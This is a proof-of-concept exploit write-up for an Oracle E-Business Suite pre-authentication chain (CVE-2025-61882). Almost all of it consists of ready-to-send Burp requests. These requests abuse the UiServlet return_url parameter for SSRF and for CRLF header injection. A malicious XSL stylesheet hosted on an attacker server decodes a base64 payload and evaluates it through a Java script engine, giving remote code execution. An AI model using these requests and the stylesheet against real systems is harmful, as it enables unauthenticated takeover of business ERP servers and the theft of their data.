Oracle E-Business Suite SSRF, CRLF (CVE-2025-61882)

Table of Contents

• SSRF
• SSRF + CRLF
• PoC
• Reference

SSRF

Using Burp Suite, send this request to Oracle E-Business Suite. Use the Hackvertor extension. Use the Burp Collaborator address to test.

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <oracle-EBS>:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Connection: keep-alive

redirectFromJsp=1&getUiType=<@urlencode_all><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url">http://<BURP-COLLABORATOR>.oastify.com</param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode_all>

SSRF + CRLF

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <oracle-EBS>:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Connection: keep-alive

redirectFromJsp=1&getUiType=<@urlencode_all><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url">http://{{external-host}}&#47;HeaderInjectionTest&#32;HTTP&#47;1&#46;1&#13;&#10;InjectedHeader&#58;Injected&#13;&#10;&#32;&#13;&#10;&#13;&#13;&#10;&#13;&#13;&#10;&#13;&#13;&#10;POST&#32;&#47;</param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode_all>

PoC

Host file ieshostedsurvey.xsl on a webserver on port 7201.

<xsl:stylesheet version="1.0"
  xmlns:xsl="<http://www.w3.org/1999/XSL/Transform>"
  xmlns:b64="<http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder>"
  xmlns:jsm="<http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager>"
  xmlns:eng="<http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine>"
  xmlns:str="<http://www.oracle.com/XSL/Transform/java/java.lang.String>">
  <xsl:template match="/">
      <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'[base64_encoded_payload]')"/>
      <xsl:variable name="js" select="str:new($bs)"/>
      <xsl:variable name="m" select="jsm:new()"/>
      <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
      <xsl:variable name="code" select="eng:eval($e, $js)"/>
      <xsl:value-of select="$code"/>
  </xsl:template>
</xsl:stylesheet>

Send the request to EBS. The keep-alive is important!

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <oracle-EBS>:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
Content-Length: 847
Content-Type: application/x-www-form-urlencoded

redirectFromJsp=1&getUiType=<@urlencode><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url"><http://<ATTACKER>:7201><@html_entities>/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
Host: attacker-oob-server
User-Agent: anything
Connection: keep-alive
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
 

POST /</@html_entities></param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode>

Reference

• Well, Well, Well. It’s Another Day. (Oracle E-Business Suite Pre-Auth RCE Chain – CVE-2025-61882) (WatchTowr)
• CrowdStrike Identifies Campaign Targeting Oracle E-Business Suite via Zero-Day Vulnerability (now tracked as CVE-2025-61882) (CrowdStrike)